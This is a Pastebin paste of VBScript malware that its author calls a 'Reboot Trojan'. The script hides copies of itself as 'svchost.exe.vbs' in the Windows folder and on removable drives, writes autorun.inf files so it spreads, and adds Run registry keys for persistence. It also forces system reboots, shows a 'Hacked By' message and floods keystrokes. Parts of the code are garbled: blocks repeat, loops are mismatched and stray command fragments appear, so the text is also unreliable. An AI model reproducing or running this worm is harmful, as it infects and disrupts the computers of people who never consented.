Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- rem - dlRB "AriyanXploit404 Reboot" Trojan script by AriyanXploit404
- On Error Resume Next
- dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
- atr = “[autorun]”&vbcrlf&”shellexecute=wscript.exe svchost.exe.vbs”
- set fs = createobject(“Scripting.FileSystemObject”)
- set mf = fs.getfile(Wscript.ScriptFullname)
- dim text,size
- size = mf.size
- check = mf.drive.drivetype
- set text=mf.openastextstream(1,-2)
- do while not text.atendofstream
- mysource=mysource&text.readline
- mysource=mysource & vbcrlf
- loop
- do
- Set winpath = fs.getspecialfolder(0)
- set tf = fs.getfile(winpath & “\svchost.exe.vbs”)
- tf.attributes = 32
- set tf=fs.createtextfile(winpath & “\svchost.exe.vbs”,2,true)
- tf.write mysource
- tf.close
- set tf = fs.getfile(winpath & “\svchost.exe.vbs”)
- tf.attributes = 39
- for each flashdrive in fs.drives
- If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
- set tf=fs.getfile(flashdrive.path &”\svchost.exe.vbs”)
- tf.attributes =32
- set tf=fs.createtextfile(flashdrive.path &”\svchost.exe.vbs”,2,true)
- tf.write mysource
- tf.close
- set tf=fs.getfile(flashdrive.path &”\svchost.exe.vbs”)
- tf.attributes =39
- set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
- tf.attributes = 32
- set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
- tf.write atr
- tf.close
- set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
- tf.attributes=39
- end if
- next
- set rg = createobject(“WScript.Shell”)
- rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\svchost.exe.vbs”
- rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,””
- rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″
- if check <> 1 then
- Wscript.sleep 100000
- end if
- loop while check<>1
- set sd = createobject(“Wscript.shell”)
- sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
- reg add
- hkey_local_machine\software\microsoft\windows\currentversionrun\vWINDOWsAPI\t
- reg_sz/d c:windowswimn32.bat/f
- reg add
- hkey_current_user\software\microsoft\windows\currentversionrun\vCONTROLexit\t
- reg_sz/d c:windowswimn32.bat/f
- do while year(now) >= 2021
- WScript.sleep 20000
- next
- dim FSobj,sysDir,generateCopy,newFile,fixedCode,procreateCopy,fileData
- set FSobj=CreateObject("Scripting.FileSystemObject")
- set sysDir = FSobj.GetSpecialFolder(1)
- createRegKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB",sysDir&"\dlRB.vbs"
- sub createRegKey(regKey,regVal)
- set regEdit = CreateObject("WScript.Shell")
- regEdit.RegWrite regKey,regVal
- end sub
- set generateCopy=FSobj.CreateTextFile(sysDir+"\dlRB.vbs")
- generateCopy.close
- set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
- setFile()
- fixedCode=replace(fileData,chr(94),"""")
- set procreateCopy=FSobj.OpenTextFile(sysDir+"\dlRB.vbs",2)
- procreateCopy.write fixedCode
- procreateCopy.close
- rebootSystem()
- function setFile()
- fileData="rem - ^dlRB^ by AriyanXploit404" &vbcrlf& _
- "strComputer = ^.^ " &vbcrlf& _
- "Set objWMIService = GetObject(^winmgmts:^ _ " &vbcrlf& _
- "& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^
- oot\cimv2^)" &vbcrlf& _
- "Set colOperatingSystems = objWMIService.ExecQuery _ " &vbcrlf& _
- "(^Select * from Win32_OperatingSystem^)" &vbcrlf& _
- "For Each objOperatingSystem in colOperatingSystems" &vbcrlf& _
- "ObjOperatingSystem.Reboot()" &vbcrlf& _
- "Next"
- end function
- function rebootSystem()
- strComputer = "."
- Set objWMIService = GetObject("winmgmts:" _
- & "{impersonationLevel=impersonate,(Shutdown)}!\\" & strComputer & "
- oot\cimv2")
- Set colOperatingSystems = objWMIService.ExecQuery _
- ("Select * from Win32_OperatingSystem")
- For Each objOperatingSystem in colOperatingSystems
- ObjOperatingSystem.Reboot()
- Next
- dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
- atr = “[autorun]”&vbcrlf&”shellexecute=wscript.exe svchost.exe.vbs”
- set fs = createobject(“Scripting.FileSystemObject”)
- set mf = fs.getfile(Wscript.ScriptFullname)
- dim text,size
- size = mf.size
- check = mf.drive.drivetype
- set text=mf.openastextstream(1,-2)
- do while not text.atendofstream
- mysource=mysource&text.readline
- mysource=mysource & vbcrlf
- next
- do
- Set winpath = fs.getspecialfolder(0)
- set tf = fs.getfile(winpath & “\svchost.exe.vbs”)
- tf.attributes = 32
- set tf=fs.createtextfile(winpath & “\svchost.exe.vbs”,2,true)
- tf.write mysource
- tf.close
- set tf = fs.getfile(winpath & “\svchost.exe.vbs”)
- tf.attributes = 39
- for each flashdrive in fs.drives
- If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
- set tf=fs.getfile(flashdrive.path &”\svchost.exe.vbs”)
- tf.attributes =32
- set tf=fs.createtextfile(flashdrive.path &”\svchost.exe.vbs”,2,true)
- tf.write mysource
- tf.close
- set tf=fs.getfile(flashdrive.path &”\svchost.exe.vbs”)
- tf.attributes =39
- set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
- tf.attributes = 32
- set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
- tf.write atr
- tf.close
- set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
- tf.attributes=39
- end if
- next
- set rg = createobject(“WScript.Shell”)
- rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\svchost.exe.vbs”
- rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,””
- rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″
- if check <> 1 then
- Wscript.sleep 100000
- end if
- loop while check<>1
- set sd = createobject(“Wscript.shell”)
- sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
- msgbox “Hacked By AriyanXploit404” & vbcrlf & _
- “Dunia Tersaji Diatas Piring Dan Kau Hanya Perlu Mengambilnya Saja” & vbcrlf & _
- “Virus Ariyan Tipe Delta” & vbcrlf & _
- “Virus Ketiga Dari AriyanXploit404” & vbcrlf & _
- vbcrlf & vbcrlf & _
- ” Namanya Baru Pemula Ya gitu deh Kan Berniat Jadi Legenda Xixixi >//w//< ” & vbcrlf & vbcrlf & _ “>//x//<”
- %SystemRoot%\System32\notepad.exe
- Set wshShell = wscript.CreateObject(“WScript.Shell”)
- do
- wscript.sleep 100
- wshshell.sendkeys “HACKED BY ARIYANXPLOIT404”
- loop
- end function
Add Comment
Please, Sign In to add comment